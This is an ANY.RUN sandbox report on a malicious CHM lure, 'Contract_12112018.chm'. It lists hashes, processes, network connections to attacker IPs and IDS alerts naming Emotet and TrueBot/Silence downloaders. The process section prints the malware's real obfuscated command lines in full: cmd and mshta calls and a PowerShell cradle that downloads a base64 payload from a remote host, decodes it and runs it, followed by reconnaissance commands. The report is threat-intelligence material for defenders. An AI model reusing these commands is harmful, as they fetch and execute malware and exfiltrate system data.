analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Contract_12112018.chm

Full analysis: https://app.any.run/tasks/236faf58-c807-45b5-8211-39ab8cf1a8e6
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Malware Trends Tracker     >>>
Analysis date: November 15, 2018, 12:00:54
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
opendir
Indicators:
MIME: application/octet-stream
File info: MS Windows HtmlHelp Data
MD5:

009C457C4456A0D0D3B38627135B6F18

SHA1:

D167B13988AA0B277426489F343A484334A394D0

SHA256:

00A1397C9C65BABE9CCBCAB73D09FDF874A35A5783BAAB60C03C18C761DA6458

SSDEEP:

96:PEFZLu40Z5Yllc1WBQi58V3eOjU7HZwsn6bde/j17b4oFY9aMfVzm5ivx0n1/JO:PSg4PwWBd581e+UtJnf1AqY9aM05GmO

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • epreprf.com (PID: 3848)
      • cmd.exe (PID: 892)
      • cmd.exe (PID: 1772)
      • epreprff.com (PID: 2956)
      • epreprff.com (PID: 840)
      • cmd.exe (PID: 2660)
      • cmd.exe (PID: 3820)
      • eprepr.com (PID: 640)
      • cmd.exe (PID: 2540)
      • cmd.exe (PID: 2744)

    • Changes the autorun value in the registry

      • eprepr.com (PID: 640)

  • SUSPICIOUS

    • Starts Internet Explorer

      • rundll32.exe (PID: 2288)

    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • cmd.exe (PID: 892)

    • Starts CMD.EXE for commands execution

      • hh.exe (PID: 2180)
      • mshta.exe (PID: 2772)
      • eprepr.com (PID: 640)

    • Starts application with an unusual extension

      • cmd.exe (PID: 1772)
      • epreprff.com (PID: 840)
      • epreprf.com (PID: 3848)

    • Executable content was dropped or overwritten

      • cmd.exe (PID: 1772)
      • eprepr.com (PID: 640)
      • epreprf.com (PID: 3848)

    • Reads internet explorer settings

      • hh.exe (PID: 2180)

    • Creates files in the user directory

      • eprepr.com (PID: 640)

    • Uses SYSTEMINFO.EXE to read environment

      • cmd.exe (PID: 2660)

    • Creates files in the program directory

      • cmd.exe (PID: 2660)

    • Starts NET.EXE for network exploration

      • cmd.exe (PID: 3820)

    • Uses IPCONFIG.EXE to discover IP address

      • cmd.exe (PID: 2540)

    • Uses WHOAMI.EXE to obtaining logged on user information

      • cmd.exe (PID: 2744)

    • Connects to server without host name

      • eprepr.com (PID: 640)

  • INFO

    • Reads Internet Cache Settings

      • iexplore.exe (PID: 3200)

    • Changes internet zones settings

      • iexplore.exe (PID: 3288)

    • Modifies the open verb of a shell class

      • rundll32.exe (PID: 2288)

    • Application launched itself

      • iexplore.exe (PID: 3288)

    • Reads internet explorer settings

      • mshta.exe (PID: 2772)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.chi | Windows HELP Index (81)
.chm | Windows HELP File (18.9)

EXIF

EXE

LanguageCode: English (U.S.)
CHMVersion: 3
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
64
Monitored processes
19
Malicious processes
7
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start drop and start rundll32.exe no specs iexplore.exe iexplore.exe no specs hh.exe no specs cmd.exe no specs mshta.exe cmd.exe epreprff.com no specs epreprff.com no specs epreprf.com eprepr.com cmd.exe no specs systeminfo.exe no specs cmd.exe no specs net.exe no specs cmd.exe no specs ipconfig.exe no specs cmd.exe no specs whoami.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2288"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\admin\AppData\Local\Temp\Contract_12112018.chm.chiC:\Windows\system32\rundll32.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3288"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\admin\AppData\Local\Temp\Contract_12112018.chm.chiC:\Program Files\Internet Explorer\iexplore.exe
rundll32.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3200"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3288 CREDAT:79873C:\Program Files\Internet Explorer\iexplore.exeiexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2180"C:\Windows\hh.exe" C:\Users\admin\Desktop\Contract_12112018.chmC:\Windows\hh.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® HTML Help Executable
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
892"C:\Windows\System32\cmd.exe" ,/b,^, ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, ,,,,,,,,,,, ,,,,,,,,,,,,,,,,,, ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,/C,, st%ALLUSERSPROFILE:~8,1%rt msht%ALLUSERSPROFILE:~8,1% H%ALLUSERSPROFILE:~12,1%%ALLUSERSPROFILE:~12,1%p://146.0.72.139/liC:\Windows\System32\cmd.exehh.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2772mshta Http://146.0.72.139/liC:\Windows\system32\mshta.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
1772"C:\Windows\System32\cmd.exe" /c copy C:\\Windows\\System32\\cmd.exe C:\Users\admin\AppData\Local\Temp\\epreprff.com && C:\Users\admin\AppData\Local\Temp\\epreprff.com /c &Set skk= -Encoding&& Set ski= Byte && Set asidfjhfwssss=den -n%ALLUSERSPROFILE:~5,1%ninter&&Set asidfjhfwsss=-n%ALLUSERSPROFILE:~5,1%p -W hid&& Set asidfjhfwsssss=active -c (new-%ALLUSERSPROFILE:~5,1%bj&& Set asidfjhfwss=ect System.Net.WebClie&& Set par5=nt).D%ALLUSERSPROFILE:~5,1%wnl%ALLUSERSPROFILE:~5,1%&& Set asidfjhfwsssssssssssssss=adfile& copy C:\\Windows\\System32\\WiNDOWSPOWerShELl\\v1.0\\pOWErsheLl.ExE C:\Users\admin\AppData\Local\Temp\\epreprf.com& C:\Users\admin\AppData\Local\Temp\\epreprff.com /c C:\Users\admin\AppData\Local\Temp\\epreprf.com %asidfjhfwsss%%asidfjhfwssss%%asidfjhfwsssss%%asidfjhfwss%%par5%%asidfjhfwsssssssssssssss%('Ht^Tp://146.0.72.139/flk', 'C:\Users\admin\AppData\Local\Temp\\eprepr.txt'); $sr=Get-Content %skk% %ski% C:\Users\admin\AppData\Local\Temp\\eprepr.txt; $sk=[System.Text.Encoding]::UTF8.GetString($sr); $sv=[Convert]::FromBase64String($sk); Add-Content %skk% %ski% C:\Users\admin\AppData\Local\Temp\\eprepr.com $sv; C:\Users\admin\AppData\Local\Temp\\eprepr.com;C:\Windows\System32\cmd.exe
mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2956C:\Users\admin\AppData\Local\Temp\\epreprff.com /c C:\Users\admin\AppData\Local\Temp\epreprff.comcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
840C:\Users\admin\AppData\Local\Temp\\epreprff.com /c C:\Users\admin\AppData\Local\Temp\\epreprf.com %asidfjhfwsss%%asidfjhfwssss%%asidfjhfwsssss%%asidfjhfwss%%par5%%asidfjhfwsssssssssssssss%('HtTp://146.0.72.139/flk', 'C:\Users\admin\AppData\Local\Temp\\eprepr.txt'); $sr=Get-Content %skk% %ski% C:\Users\admin\AppData\Local\Temp\\eprepr.txt; $sk=[System.Text.Encoding]::UTF8.GetString($sr); $sv=[Convert]::FromBase64String($sk); Add-Content %skk% %ski% C:\Users\admin\AppData\Local\Temp\\eprepr.com $sv; C:\Users\admin\AppData\Local\Temp\\eprepr.com;C:\Users\admin\AppData\Local\Temp\epreprff.comcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3848C:\Users\admin\AppData\Local\Temp\\epreprf.com -nop -W hidden -noninteractive -c (new-object System.Net.WebClient).Downloadfile('HtTp://146.0.72.139/flk', 'C:\Users\admin\AppData\Local\Temp\\eprepr.txt'); $sr=Get-Content -Encoding Byte C:\Users\admin\AppData\Local\Temp\\eprepr.txt; $sk=[System.Text.Encoding]::UTF8.GetString($sr); $sv=[Convert]::FromBase64String($sk); Add-Content -Encoding Byte C:\Users\admin\AppData\Local\Temp\\eprepr.com $sv; C:\Users\admin\AppData\Local\Temp\\eprepr.com;C:\Users\admin\AppData\Local\Temp\epreprf.com
epreprff.com
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 927
Read events
1 641
Write events
0
Delete events
0

Modification events

No data
Executable files
4
Suspicious files
1
Text files
8
Unknown types
1

Dropped files

PID
Process
Filename
Type
3288iexplore.exeC:\Users\admin\AppData\Local\Temp\~DFD6F1DC22B0019D8F.TMP
MD5:
SHA256:
3288iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\favicon[1].ico
MD5:
SHA256:
3288iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
3288iexplore.exeC:\Users\admin\AppData\Local\Temp\~DFC9E3101B91B3228B.TMP
MD5:
SHA256:
3288iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{34001DD3-E8CE-11E8-BFAB-5254004AAD11}.dat
MD5:
SHA256:
3288iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\{34001DD4-E8CE-11E8-BFAB-5254004AAD11}.datbinary
MD5:039C9883D66BE26BCAAA3CAE480955F2
SHA256:819114DFD69F407FD4C696AAF0081271401F5DD6A16311CA7E20084306A0C062
3200iexplore.exeC:\Users\admin\AppData\Local\Temp\JavaDeployReg.logtext
MD5:688B725449ABE78690748036A42B80E1
SHA256:16BC9EA1E1ED0B0B91182C83A428D60C179AE667ECDDEBBF956881B3E2640F85
3848epreprf.comC:\Users\admin\AppData\Local\Temp\eprepr.txttext
MD5:53F4A016A61040273478E1C3C10FF8A3
SHA256:9FB4281BC5994209DCED167E4D34BFEDF3B8A6F882B1A7C92F30970DB5E30548
2660cmd.exeC:\ProgramData\INFOCONTENT.TXTtext
MD5:ADF7DE1E0596E9C9C1B2C2E13F9B4D3B
SHA256:95EB16AB4810A82113A33EBA746E1A247B52A7883AA0B790FAD98E4DFD67281C
2540cmd.exeC:\ProgramData\INFOCONTENT.TXTtext
MD5:87E03E03D5D3061A79AC20E0716222E6
SHA256:145F717DCC86697B9AC943846ECC6FFD38DB560E9B53489F1B61F52D087B96E1
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
4
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2772
mshta.exe
GET
200
146.0.72.139:80
http://146.0.72.139/li
NL
html
2.93 Kb
suspicious
3848
epreprf.com
GET
200
146.0.72.139:80
http://146.0.72.139/flk
NL
text
136 Kb
suspicious
640
eprepr.com
POST
200
146.0.72.188:80
http://146.0.72.188/ipv6/mod/checker_info.php
NL
text
65 b
malicious
640
eprepr.com
GET
200
146.0.72.188:80
http://146.0.72.188/ipv6/ipvcheck.php?dns=c4ba3647
NL
text
5 b
malicious
3288
iexplore.exe
GET
200
204.79.197.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3288
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
640
eprepr.com
146.0.72.188:80
Hostkey B.v.
NL
malicious
3848
epreprf.com
146.0.72.139:80
Hostkey B.v.
NL
suspicious
2772
mshta.exe
146.0.72.139:80
Hostkey B.v.
NL
suspicious

DNS requests

Domain
IP
Reputation
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted
dns.msftncsi.com
  • 131.107.255.255
shared

Threats

PID
Process
Class
Message
3848
epreprf.com
A Network Trojan was detected
SC TROJAN_DOWNLOADER Generic Trojan Emotet downloader
3848
epreprf.com
A Network Trojan was detected
ET TROJAN Windows executable base64 encoded
3848
epreprf.com
Misc activity
POLICY [PTsecurity] Executable base64 Payload
640
eprepr.com
A Network Trojan was detected
MALWARE [PTsecurity] SystemInfo Exfiltration
640
eprepr.com
A Network Trojan was detected
MALWARE [PTsecurity] SystemInfo Exfiltration
640
eprepr.com
Potentially Bad Traffic
GPL ATTACK_RESPONSE command completed
640
eprepr.com
A Network Trojan was detected
ET TROJAN TrueBot/Silence.Downloader Keep-Alive
640
eprepr.com
Misc activity
SUSPICIOUS [PTsecurity] Possible TrojanDownloader
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
Contract_12112018.chm